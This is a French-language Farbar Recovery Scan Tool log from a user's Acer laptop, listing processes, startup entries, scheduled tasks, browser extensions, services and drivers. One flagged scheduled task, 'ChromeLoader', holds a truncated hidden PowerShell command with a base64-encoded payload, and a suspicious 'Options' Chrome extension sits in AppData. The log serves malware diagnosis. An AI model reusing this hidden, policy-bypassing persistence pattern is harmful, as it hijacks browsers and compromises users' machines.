Comment: FRST
Document format: text/plain
Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Exécuté par NzL_O (administrateur) sur LAPTOP-GP6RIR95 (Acer Aspire VN7-591G) (09-01-2022 20:01:58)
Exécuté depuis C:\Users\NzL_O\Desktop
Profils chargés: NzL_O
Plate-forme: Microsoft Windows 10 Famille Version 20H2 19042.1415 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
(Acer Incorporated -> ) C:\Program Files (x86)\Acer\abDocs\abDocsDllLoader.exe
(Acer Incorporated -> ) C:\Program Files (x86)\Acer\abDocs\abDocsDllLoaderMonitor.exe
(Acer Incorporated -> ) C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
(Acer Incorporated -> Acer Cloud Technology) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAdminAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QAAgent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALockHandler.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QALSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer Quick Access\QASvc.exe
(Acer Incorporated -> Acer) C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\SecureLine VPN\Vpn.exe <4>
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\SecureLine VPN\VpnSvc.exe
(Dashlane -> Dashlane SAS) C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe
(Discord Inc. -> Discord Inc.) C:\Users\NzL_O\AppData\Local\Discord\app-1.0.9003\Discord.exe <6>
(Dolby Laboratories, Inc. -> Dolby Laboratories Inc.) C:\Program Files\Dolby Digital Plus\ddp.exe
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2>
(Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <12>
(Intel Corporation - Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) [Fichier non signé] C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office15\FIRSTRUN.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MoUsoCoreWorker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Qualcomm Atheros -> Windows (R) Win 7 DDK provider) C:\Windows\System32\AdminService.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Swift Media Entertainment, Inc. -> Blitz, Inc.) C:\Users\NzL_O\AppData\Local\Programs\Blitz\Blitz.exe <7>
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <4>
(Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
==================== Registre (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16152792 2015-07-17] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1394392 2015-07-14] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2754704 2015-06-23] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1571696 2015-06-23] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Fichier non signé]
HKLM-x32\...\Run: [abDocsDllLoader] => C:\Program Files (x86)\Acer\abDocs\abDocsDllLoader.exe [92928 2015-05-07] (Acer Incorporated -> )
HKLM-x32\...\Run: [BacKGround Agent] => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [66304 2015-05-06] (Acer Incorporated -> Acer Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [Discord] => C:\Users\NzL_O\AppData\Local\Discord\Update.exe [1512608 2021-09-21] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [com.blitz.app] => C:\Users\NzL_O\AppData\Local\Programs\Blitz\Blitz.exe [121842952 2022-01-08] (Swift Media Entertainment, Inc. -> Blitz, Inc.)
HKU\S-1-5-21-1677540230-3073805055-3309549447-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [33618400 2021-12-28] (Epic Games Inc. -> Epic Games, Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\97.0.4692.71\Installer\chrmstp.exe [2022-01-05] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Avast SecureLine VPN.lnk [2021-12-21]
ShortcutTarget: Avast SecureLine VPN.lnk -> C:\Program Files\AVAST Software\SecureLine VPN\Vpn.exe (Avast Software s.r.o. -> AVAST Software)
==================== Tâches planifiées (Avec liste blanche) ============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0269F88A-D659-437A-8656-689153BAB150} - System32\Tasks\FUBTrackingByPLD => C:\OEM\Preload\FubTracking\FubTracking.exe [30976 2015-05-14] (Acer Incorporated -> )
Task: {05DDD13D-4BC5-4906-935A-7D5D3B365855} - System32\Tasks\Microsoft\Office\Microsoft Office Touchless Attach Notification => C:\Program Files (x86)\Microsoft Office\Office15\FirstRun.exe [989864 2015-03-14] (Microsoft Corporation -> Microsoft Corporation)
Task: {17ED66E9-4C6A-4B25-ADA8-D8316B351B54} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus). (Pas de fichier) <==== ATTENTION
Task: {1F14636B-3E4A-4D76-A22B-4047EBF122C9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-11-14] (Google LLC -> Google LLC)
Task: {228FDDE6-C0E6-4B02-98BD-F15CEFFC995A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-11-14] (Google LLC -> Google LLC)
Task: {256BE520-4CD0-48EA-8A44-37552F151231} - System32\Tasks\Avast SecureLine VPN Update => C:\Program Files\Avast Software\SecureLine VPN\VpnUpdate.exe [1226520 2021-12-20] (Avast Software s.r.o. -> AVAST Software)
Task: {25D06F84-3B89-4F57-B4EB-AEEB94772FA6} - System32\Tasks\Avast Software\Avast SecureLine VPN Update => C:\Program Files\Common Files\Avast Software\Icarus\avast-vpn\icarus.exe [6475544 2021-12-14] (Avast Software s.r.o. -> Avast Software)
Task: {3BEB0F06-80E0-4A06-87A8-2EA0F49C9148} - System32\Tasks\WpsUpdateTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe [474472 2016-04-14] (Zhuhai Kingsoft Office Software Co.,Ltd -> Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {4E53AF93-0F08-4BCE-A1E8-A9808C389146} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2574080 2015-05-07] (Acer Incorporated -> Acer)
Task: {55F76E7D-F5FC-43DF-A21C-F872A405D872} - System32\Tasks\WpsNotifyTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe [517480 2016-04-14] (Zhuhai Kingsoft Office Software Co.,Ltd -> Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {748C56D9-D949-423A-BAD8-FA08023868C5} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [472928 2015-07-17] (Acer Incorporated -> Acer Incorporated)
Task: {82DCCED7-A6E9-437C-A54F-1FC2A0E8F0CC} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTrayLauncher.exe [384256 2015-05-14] (Acer Incorporated -> Acer Incorporated)
Task: {91F9D2B6-9405-4B55-8297-BF24C7AD5C78} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [40288 2015-07-10] (Acer Incorporated -> )
Task: {963D0548-1350-439C-91DB-3B3E394E6CEE} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2858336 2015-07-10] (Acer Incorporated -> )
Task: {990840B6-1D29-4796-8B6E-5633AB46887E} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe /nogui (Pas de fichier)
Task: {99947389-CDA2-4048-808A-A6DD33033CB9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AB29049B-63BE-46E9-BC3E-DB9730B3472D} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe [585600 2014-04-07] (Dolby Laboratories, Inc. -> Dolby Laboratories Inc.)
Task: {B4C5195B-AEE2-4AD8-9203-D9CADE87E033} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B98F5028-6651-4C09-98E8-AE293513B817} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C493888B-F10D-41C8-884B-493C5A19C0B4} - System32\Tasks\Avast Software\Avast SecureLine VPN Bug Report => C:\Program Files\Avast Software\SecureLine VPN\AvBugReport.exe [4760344 2021-12-20] (Avast Software s.r.o. -> AVAST Software) -> --send "dumps|report" --silent --product 11 --programpath "C:\Program Files\Avast Software\SecureLine VPN" --configpath "C:\ProgramData\Avast Software\SecureLine VPN" --path "C:\ProgramData\Avast Software\SecureLine VPN\log" --path "C:\ProgramData\Avast Software\Icarus\Logs" --logpath "C:\ProgramData\Avast Software\SecureLine VPN\log" --guid f723b198-e255-4262-b5b6-ac424a5c84c8
Task: {C5A3953B-2519-402A-90DB-1F963A64A611} - System32\Tasks\Microsoft\Windows\WindowsUpdate\RUXIM\RUXIMDisplay => C:\Program Files\ruxim\ruximics.exe [477512 2021-05-19] (Microsoft Windows -> Microsoft Corporation)
Task: {CD6F702C-470B-4241-8589-E1071B89BA8F} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [4580704 2015-07-10] (Acer Incorporated -> )
Task: {DB4A415B-0C0F-44CC-BD8F-12F69F242D00} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {E6749EA1-2BD3-4D47-9F81-D96871D67DCE} - System32\Tasks\Microsoft\Windows\WindowsUpdate\RUXIM\RUXIMSync => C:\Program Files\ruxim\ruximics.exe [477512 2021-05-19] (Microsoft Windows -> Microsoft Corporation)
Task: {EEBCCD6C-8BB0-4F76-A38C-93E62BAF9791} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [379232 2015-07-17] (Acer Incorporated -> Acer Incorporated)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\WpsNotifyTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe
Task: C:\WINDOWS\Tasks\WpsUpdateTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{44eda934-1985-4c79-bff9-95c9633967c3}: [DhcpNameServer] 192.18.128.24
Tcpip\..\Interfaces\{4e019667-9923-448a-a780-97532ee0b89c}: [DhcpNameServer] 192.168.1.1
Edge:
=======
Edge Profile: C:\Users\NzL_O\AppData\Local\Microsoft\Edge\User Data\Default [2021-12-28]
FireFox:
========
FF DefaultProfile: mnt7dg4c.default
FF ProfilePath: C:\Users\NzL_O\AppData\Roaming\Mozilla\Firefox\Profiles\mnt7dg4c.default [2021-11-14]
FF Homepage: Mozilla\Firefox\Profiles\mnt7dg4c.default -> hxxps://www.google.fr/#spf=1636896920582
FF Extension: (Français Language Pack) - C:\Users\NzL_O\AppData\Roaming\Mozilla\Firefox\Profiles\mnt7dg4c.default\Extensions\langpack-fr@firefox.mozilla.org [2021-11-14] []
FF Extension: (Mozilla Partner Defaults) - C:\Users\NzL_O\AppData\Roaming\Mozilla\Firefox\Profiles\mnt7dg4c.default\Extensions\partnerdefaults@mozilla.com [2021-11-14] []
FF Extension: (Français Language Pack) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\langpack-fr@firefox.mozilla.org [2021-11-14] []
FF Extension: (Mozilla Partner Defaults) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\partnerdefaults@mozilla.com [2021-11-14] []
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2021-11-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2021-11-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-04-21] (Intel(R) Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-04-21] (Intel(R) Identity Protection Technology Software -> Intel Corporation)
Chrome:
=======
CHR DefaultProfile: Profile 2
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default [2021-12-20]
CHR Notifications: Default -> hxxps://play.pokemonshowdown.com; hxxps://www.facebook.com; hxxps://www.romstation.fr
CHR Session Restore: Default -> est activé.
CHR Extension: (Slides) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-11-14]
CHR Extension: (Docs) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-11-14]
CHR Extension: (Google Drive) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-11-14]
CHR Extension: (YouTube) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-11-14]
CHR Extension: (Sheets) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-11-14]
CHR Extension: (Google Docs hors connexion) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-12-05]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-11-14]
CHR Extension: (Gmail) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-11-14]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Guest Profile [2022-01-09]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-12-01]
CHR Extension: (Slides) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-11-27]
CHR Extension: (Docs) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2021-11-27]
CHR Extension: (Google Drive) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-11-27]
CHR Extension: (YouTube) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-11-27]
CHR Extension: (Sheets) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-11-27]
CHR Extension: (Google Docs hors connexion) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-27]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-11-27]
CHR Extension: (Gmail) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-11-27]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2 [2022-01-09]
CHR Extension: (Slides) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-11-28]
CHR Extension: (Docs) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2021-11-28]
CHR Extension: (Google Drive) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-11-28]
CHR Extension: (YouTube) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-11-28]
CHR Extension: (Sheets) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-11-28]
CHR Extension: (Google Docs hors connexion) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-28]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-11-28]
CHR Extension: (Gmail) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-11-28]
CHR Extension: (Options) - C:\Users\NzL_O\AppData\Local [2022-01-09]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\System Profile [2022-01-09]
==================== Services (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2839296 2015-05-06] (Acer Incorporated -> Acer Incorporated)
R2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [75056 2015-06-24] (Dashlane -> Dashlane SAS)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2021-10-01] (Epic Games Inc. -> Epic Games, Inc.)
R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [2573568 2015-05-14] (Acer Incorporated -> Acer Incorporated)
R3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Fichier non signé]
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Fichier non signé]
S2 Kingsoft_WPS_UpdateService; C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdatesvr.exe [133480 2016-04-14] (Zhuhai Kingsoft Office Software Co.,Ltd -> Zhuhai Kingsoft Office Software Co.,Ltd)
R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [395616 2015-07-17] (Acer Incorporated -> Acer Incorporated)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [450400 2015-07-17] (Acer Incorporated -> Acer Incorporated)
R2 SecureLine; C:\Program Files\Avast Software\SecureLine VPN\VpnSvc.exe [9210136 2021-12-20] (Avast Software s.r.o. -> AVAST Software)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [14754088 2021-11-06] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [247040 2015-05-27] (Acer Incorporated -> acer)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\1.5.471.0\McCSPServiceHost.exe" [X]
S2 nvsvc; "C:\Windows\system32\nvvsvc.exe" [X]
===================== Pilotes (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 aswVpnRdr; C:\WINDOWS\System32\drivers\aswVpnRdr.sys [56960 2021-11-14] (Avast Software s.r.o. -> Avast Software)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-10-25] (Disc Soft Ltd -> Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-10-25] (Disc Soft Ltd -> Disc Soft Ltd)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [31000 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [25368 2018-05-15] (Acer Incorporated -> Acer Incorporated)
S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
S3 ssudcdf; C:\WINDOWS\System32\drivers\ssudcdf.sys [36608 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [206080 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [206080 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64912 2017-05-18] (Samsung Electronics Co., Ltd. -> QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [70400 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [206080 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_conn_usb_driver; C:\WINDOWS\System32\Drivers\ss_conn_usb_driver.sys [26368 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S3 VBoxUSB; C:\WINDOWS\System32\Drivers\VBoxUSB.sys [114632 2015-09-16] (Duodian Online Technology Co. Ltd. -> BigNox Corporation)
